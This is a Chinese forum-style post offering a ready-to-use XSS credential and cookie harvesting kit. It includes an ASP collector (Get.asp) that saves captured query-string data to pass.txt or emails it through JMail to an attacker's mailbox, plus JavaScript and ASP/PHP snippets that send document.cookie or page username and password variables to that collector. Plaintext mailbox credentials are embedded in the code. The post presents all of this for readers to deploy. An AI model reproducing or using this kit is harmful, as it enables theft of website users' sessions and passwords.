|
很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。
今天写个通用脚本工具
文件如下
asp.asp或者php.php 或者cookies.htm效果如下
保存文本
发送邮件
获取的cookies
截获用户名密码
主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱
内容如下:使用方法:
asp.asp是Asp中调用Get.asp的例子内容如下
即在存在需要获取的变量的地方添加如下JS代码即可
通常在页面最下面添加即可。因为变量一般赋值后都不会清空。
如果在asp脚本中间需要添加JS则需要先闭合语句普通浏览复制代码打印代码
<%
username="admin"
password="admin888"%> <script src="get.asp?username=<%=username%>&password=<%=password%>" />
<% response.write Response.Cookies()
%>
<%
username="admin"
password="admin888"
%>
<script src="get.asp?username=<%=username%>&password=<%=password%>" />
<%
response.write Response.Cookies()
%>
普通浏览复制代码打印代码
<?
$username="admin"; $password="admin888";
?>
<script src="get.asp?username=<?=$username;?>&password=<?=$password;?>"/>
<?
$username="admin";
$password="admin888";
?>
<script src="get.asp?username=<?=$username;?>&password=<?=$password;?>"/>
普通浏览复制代码打印代码
<script>
var url="Get.asp?cookies="+document.cookie; var image = new Image();
image.style.width = 0; image.style.height = 0;
image.src = url;
</script>
<script>
var url="Get.asp?cookies="+document.cookie;
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = url;
</script>
php.php是PHP中使用例子。代码如下:cookies.htm是用来获取Cookies的例子
代码如下:有任何问题和意见跟帖。。。
另外。
所有的参数可以自己添加。你可以Get.asp?a=abc&b=abc&c=abcZ&...多少个变量都行...Get.asp?账号=abc&密码=abc这样也可以
具体自己用用就明白了。
需要深入处理Cookies的自己根据实际情况调整吧。。
这只是一个通用的。方便例子。呼呼。
普通浏览复制代码打印代码
<%
SaveFile="pass.txt"
'保存获取数据的TXT
IfSendMail=true '是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件YourSendMail="521hack@163.com"
'用来发送的邮箱
YourSendMailUser="521hack"
'邮箱登陆用户名YourSendMailPass="123456abcf"
'邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们测试,24小时后我修改密码...
YourSendMailServer="smtp.163.com"
'邮件服务器YourMailTitle="有新截获的数据来了!"
'邮件标题
YourRecvMail="xxxx@qq.com"
'收取截获数据的邮箱,建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息
sub sendmail(content)
On error resume next dim JMail
Set JMail = Server.CreateObject("JMail.Message") JMail.Logging = TrueJMail.Charset = "gb2312"
JMail.ContentType = "text/html"JMail.From = YourSendMail JMail.FromName = ""&YourSendMailUser
JMail.MailServerUserName = YourSendMailUser JMail.MailServerPassword = YourSendMailPass
JMail.Priority = 1 JMail.AddRecipient YourRecvMail
JMail.Subject = YourMailTitle JMail.Body = content
JMail.Send("smtp.163.com") Set JMail = nothing
If err then Response.write "发送失败!请检查配置!并确认你的服务器是否支持Jmail!"else Response.write "发送成功!"end if end sub
GetPostStr=Request.QueryString
if GetPostStr="" then Response.write "None!"end if
if ifsendmail then StrTemp=Replace(GetPostStr,"=",":")
StrTemp=Replace(StrTemp,"&","<br>") sendmail(StrTemp)
else set F=server.CreateObject("scripting.filesystemobject")
set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0) TempStr=Split(GetPostStr,"&")
for TempI=0 To Ubound(TempStr) I.WriteLine(Replace(TempStr(TempI),"=",":"))
next I.WriteLine(now())
I.WriteLine("--------------------------------") I.close
Set F=nothing end if
%>
<%
SaveFile="pass.txt" '保存获取数据的TXT
IfSendMail=true '是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件
YourSendMail="521hack@163.com" '用来发送的邮箱
YourSendMailUser="521hack" '邮箱登陆用户名
YourSendMailPass="123456abcf" '邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们测试,24小时后我修改密码...
YourSendMailServer="smtp.163.com" '邮件服务器
YourMailTitle="有新截获的数据来了!" '邮件标题
YourRecvMail="xxxx@qq.com" '收取截获数据的邮箱,建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息
sub sendmail(content)
On error resume next
dim JMail
Set JMail = Server.CreateObject("JMail.Message")
JMail.Logging = True
JMail.Charset = "gb2312"
JMail.ContentType = "text/html"
JMail.From = YourSendMail
JMail.FromName = ""&YourSendMailUser
JMail.MailServerUserName = YourSendMailUser
JMail.MailServerPassword = YourSendMailPass
JMail.Priority = 1
JMail.AddRecipient YourRecvMail
JMail.Subject = YourMailTitle
JMail.Body = content
JMail.Send("smtp.163.com")
Set JMail = nothing
If err then
Response.write "发送失败!请检查配置!并确认你的服务器是否支持Jmail!"
else
Response.write "发送成功!"
end if
end sub
GetPostStr=Request.QueryString
if GetPostStr="" then
Response.write "None!"
end if
if ifsendmail then
StrTemp=Replace(GetPostStr,"=",":")
StrTemp=Replace(StrTemp,"&","<br>")
sendmail(StrTemp)
else
set F=server.CreateObject("scripting.filesystemobject")
set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0)
TempStr=Split(GetPostStr,"&")
for TempI=0 To Ubound(TempStr)
I.WriteLine(Replace(TempStr(TempI),"=",":"))
next
I.WriteLine(now())
I.WriteLine("--------------------------------")
I.close
Set F=nothing
end if
%>
%> '闭合上半部分
这里是js
<% '闭合下半部分
%> '闭合上半部分
这里是js
<% '闭合下半部分
|
推荐
评论(0条)
